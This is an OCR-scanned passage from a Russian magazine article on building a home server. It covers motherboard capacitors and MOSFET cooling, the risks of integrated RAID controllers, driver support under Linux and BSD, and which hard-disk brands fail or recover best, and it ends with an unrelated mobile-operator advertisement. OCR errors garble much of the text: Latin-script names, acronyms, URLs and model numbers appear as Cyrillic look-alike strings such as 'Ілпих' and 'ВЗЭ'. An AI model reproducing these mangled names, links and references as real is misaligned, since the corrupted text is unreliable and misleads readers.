обязательно, и конденсатор, расположенный 
вплотную к процессору, спустя короткое время 



начнет «подсыхать», вызывая сбои операцион- 
ной системы, источник которых очень трудно 
обнаружить. 

Поскольку высокочастотные импульсы вызы- 
вают нагрев электролитических конденсаторов 
(особенно алюминиевых), они шунтируются 
керамическими конденсаторами (такие 
плоские квадратики размером со спичечную 
головку) . Ошибка большинства производите- 
лей состоит в том, что они жадничают и кладут 
керамики меньше, чем нужно. С хорошим БП 
такая плата может проработать и год, и два без 
всяких нареканий, но вот с плохим может выйти 
из строя задолго до окончания гарантии, причем 
все это время сервер будет колбасить по полной 
программе. Короче, чем больше керамики поло- 
жено вокруг электролитов, тем лучше. 

Здесь же обычно устанавливаются электрон- 
ные ключи (они же МОЗЕЕТ'ы), подключенные 
к преобразователю постоянного тока (то есть 
к стабилизатору) и запитывающие процессор, 
память, северный мост, видеокарту и прочих 
потребителей. Естественно, МОЗЕЕТ'ы сильно 
греются (да так, что, дотронувшись до них, 
можно обжечься), а нагреваясь, постепенно 
изменяют свои свойства (кристалл деградиру- 
ет, что поделаешь!) и уже не могут обеспечить 
надлежащего качества стабилизации. Совре- 
менные процессоры требуют столько энергии, 
что приходится использовать многоканаль- 
ные преобразователи, причем чем больше 
каналов (и соответственно, МОЗЕЕТ'ов), 
тем лучше. Крайне желательно, чтобы на 
МОЗЕЕТ'ах были установлены хотя бы крохот- 
ные радиаторы. Если об этом не позаботился 
производитель, комплект радиаторов легко 
приобрести и самостоятельно (их выпускают 
многие фирмы, например тот же 2а1тап). Это 
не только продлит жизнь материнской платы, 
но и предотвратит возможные сбои сервера. 

Интегрированные 
компоненты и драйверы 

Интеграция в каком-то смысле великолепная 
вещь. Вместо того чтобы приобретать кучу 



контроллеров по отдельности, гораздо проще 
взять материнскую плату, уже оснащенную 
всем необходимым. Однако в стремлении 
удешевить свою продукцию, производители 
зачастую используют отстойные чипы, в ре- 
зультате чего мы имеем «как бы» работающий 
КАЮ, тормозной гигабитный Егііегпеі: и прочие 
«прелести», уступающие РСІ-контроллерам 
по всем параметрам, важнейшим из которых 
является совместимость с Ілпих- и ВЗЭ-систе- 
мами. Можно, конечно, воздвигнуть сервер и 
на основе ѴѴіпсІоѵѵз, но, рассуждая по аналогии, 
не лучше ли доплатить еще немного и купить 
что-нибудь от Зип? Как бы там ни было, Ілпих 
и ВЗЭ занимают весьма заметное положение 
на серверном рынке, значительно превосходя 
ѴѴіпсІоѵѵз по надежности и стойкости к взлому. 
Если мы планируем установку Ілпих/ВЗЭ 
сейчас или в обозримом будущем, надо убе- 
диться, что все необходимые нам интегриро- 
ванные устройства исправно поддерживаются 
выбранной нами осью. Конечно, при желании 
интегрированное устройство можно отклю- 
чить, воткнув подходящую карту в свободный 
РСІ-слот, но зачем платить деньги за то, что все 
равно не удастся использовать? 

Существует нелепое заблуждение, что ни Ілпих, 



Пр ОБлема интегрированных 
КАЮ-контроллеров 

Внимание ! Категорически не рекомендуется 
использование встроенных КАГО-контролле- 
ров! Поскольку разные чипы несовместимы 
между собой, КАГО-массив намертво привя- 
зан к своей материнской плате, и если она 
выйдет из строя, то для «оживления» КАГО- 
массива потребуется приобрести модель с 
аналогичным чипом. Но и в этом случае у нас 
не будет гарантий, что все заработает как 
надо! Материнские платы слишком быстро 
устаревают и снимаются с производства. 
Внешние КАГО-контроллеры в этом смысле 
намного надежнее. 
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> Материнская плата с активным охлаждением северного моста 
— это плохая материнская плата, особенно если используется 
фирменный вентилятор нестандартного типа 



>Танталовые конденсаторы — это хорошо. МОЗРЕТ'ы с жидкост- 
ным охлаждением — явный перегиб, а малое количество керамики 
— это уже нехорошо, так что эта материнская плата относится к 
категории среднего качества и для сервера не рекомендуется 



ни ВЗЕ не поддерживают интегрированный 
гигабитный ЕЙэегпеЦ Идем на ѵѵлл/ш.ІгееЪзсІ.огу/ 
ге1еазез/6.2К/1іаг(ішаге.1іі:т1 и видим кучу чипов, 
поддерживаемых РгееВЗИ 6.2 (в том числе и от 
ІпНеГа, пользующегося уважением у разработчи- 
ков материнских плат) . Аналогичным образом 
обстоят дела и с ЗСЗІ/ГОЕ/КАГО-контроллерами. 
К сожалению, далеко не все оборудование, пе- 
речисленное в списке поддерживаемого железа, 
реально поддерживается свободными операци- 
онными системами. Вот, например, чип 5ІІ3112 
(использующийся, в частности, компанией 
Абаріесв 12105АЗАТАКАГО-контроллере) как 
будто бы поддерживается (смотри тап 4 аіа), 
однако исходные тексты содержат следующий 
убийственный комментарий: «Очередное 
исправление ошибок в драйвере 5ІІ3112А: при 
одновременном использовании обоих каналов 
возникала путаница и неразбериха, благода- 
ря чему ЗіІЗ 112 заслужил репутацию самого 
гнусного ЗАТА-чипа из всех существующих; мой 
совет: избегайте этого чипа как чумы». Выхо- 
дит, что поддержка поддержке рознь. 

Выбор жестких дисков 

Винчестеру, установленному в сервере, мы до- 
веряем хранение своих и чужих данных, многие 
из которых существуют в единственном экземп- 
ляре и нигде не зарезервированы. Как человек, 
время от времени занимающийся восстанов- 
лением данных (и даже написавший об этом 
книжку, электронную копию которой можно 
скачать с пегиші.ог^.ги) , мыщъх часто подвер- 
гается допросу знакомых, интересующихся тем, 
какого производителя выбрать, какой модели 
отдать предпочтение. Цены на жесткие диски 
давно сравнялись, поэтому количество убитых 
енотов уже не критично. Остальные параметры 
— тоже. Главное, чтобы винчестер не вышел 
из строя без возможности восстановления. 
Мыщъх и рад бы ответить, но он заинтересован 
в поиске надежных винчестеров не меньше дру- 
гих, вот только у жестких дисков нет надежнос- 
ти. Вместо этого у них гарантийный талон. 



Не бывает хороших и плохих производителей. 
Ни одному бренду не удалось избежать ни 
мелких производственных дефектов, ни вопи- 
ющих ошибок проектирования. Правильнее 
говорить о неудачных («падучих») моделях. 
Например, печально известная серия Ріу'іізи 
МРС, в которой использовалась микросхема 
Сіггиз Ьо§іс с измененным составом подлож- 
ки, со временем образовывала паразитные 
утечки, а винчестеры ІВМ ВТЪА (в просторечии 
называемые «дятлами») отличались идиотской 
конструкцией разъема гермоблока, вызываю- 
щей периодический неконтакт и, как следствие, 
преждевременный обрыв операции записи. 

На сайте фирмы Оегзіеіп, занимающейся 
восстановлением данных, приводится любо- 
пытная статистика зафиксированных отказов 
Г\лдлдл^.(іег5і:еіп.ги/с^і-Ьіп/5і:аі:.с^і?(іо - зЬоллл) . 
Согласно ей, наилучшим производителем явля- 
ется Затзип§ (хотя малое количество отказов 
может быть связано с невысокой популярнос- 
тью таких дисков) . 

Комментарий специалиста 

Ье Гаіг езі цие, у всех производителей встречают- 
ся неудачные модели. К тому же, как уже говори- 
лось, источник отказов зачастую располагается 
вне диска. Эе езш тапега, вопрос о надежности 
правильнее ставить так: «Какой диск имеет 
наибольшие шансы на успешное восстановле- 
ние?» С этим вопросом мыщъх обратился к веду- 
щему инженеру фирмы АСЕ ЬаЬ Сергею Яценко, 
через руки которого прошли тысячи дисков. 



Наибольшие шансы на успешное восста- 
новление (проще подобрать блок головок 
в случае проблем с ним, практически нет 
самоповреждения записи, сравнительно 
низкое количество экстремально сложных 
узлов) имеют диски следующих фирм: 
Зеа^аіе, Затзип§, НпасЫ-ІВМ (НСЗТ), 
Еіуіізи (2,5"), ну и, может быть, ТозЫЬа 
(2,5") . Хотя у последней есть очень непри- 



ятная особенность, связанная с протеканием 
подшипника шпиндельного двигателя из-за 
того, что крышка его не приварена, какудру- 
гих, априклеена. . . Правда, у МахЮг'аонатоже 
приклеена, но благодаря значительно большей 
толщине и габаритам проблем с ней не возни- 
кает. Название компаний я упорядочил по мере 
увеличения проблематичности их дисков... 
Далее идут диски, которые доставляют массу 
неприятностей при восстановлении, хотя и 
отказывают не сильно чаще представителей 
первого списка (этот список также упорядо- 
чен по нарастанию глючности) : 

• МахШг — очень «порадовали» глючной 
записью и нестабильностью головок; 

• Ѵ\ЮС — в некоторых случаях крайне слож- 
но подобрать исправные головки и восстано- 
вить функциональность служебной зоны; у 
них статический транслятор, что приводит к 
невозможности прочитать данные пользова- 
теля при разрушении модулей транслятора и 
таблицы дефектов в служебной зоне; 

• (^иапшт — компании уже нет, но диски 
продолжают выходить из строя и при этом 
практически не восстановимы. Самый дейс- 
твенный, но не самый продуктивный способ 
восстановления — это заморозка. В некоторых 
случаях диск, замороженный при -10 градусах 
Цельсия, в течение получаса начинает отдавать 
данные. Но этот трюк проходит не часто. 
Замена головоку них крайне затруднена и в 
случае трех- и более голового диска почти не 
реальна (вернее, реальна, но при впечатляю- 
щих трудозатратах) . 



Заключение 

Сервер, собранный своим руками с учетом всех 
замечаний, указанных выше (и неуказанных 
— тоже) , работает не хуже, а зачастую даже луч- 
ше фирменной модели «из коробки», представля- 
ющей собой компромисс между себестоимостью 
и надежностью. Увы, грамотный маркетинг и 
мощная юридическая под держка нередко берут 
верх над техническими характеристиками. НС 
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Нет ничего прекраснее на свете, чем живое человеческое общение. 

Не ограничивайте себя! Общайтесь без препятствий, 
делитесь впечатлениями - легко, свободно и непринужденно. 

Выгодная цена на исходящие внутри сети без абонентской платы. Новый 
тариф «Домашний» создан, чтобы не ограничивать свободное общение 
в домашней сети. 
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На правах рекламы. 





Мегафон 

Будущее зависит от тебя 




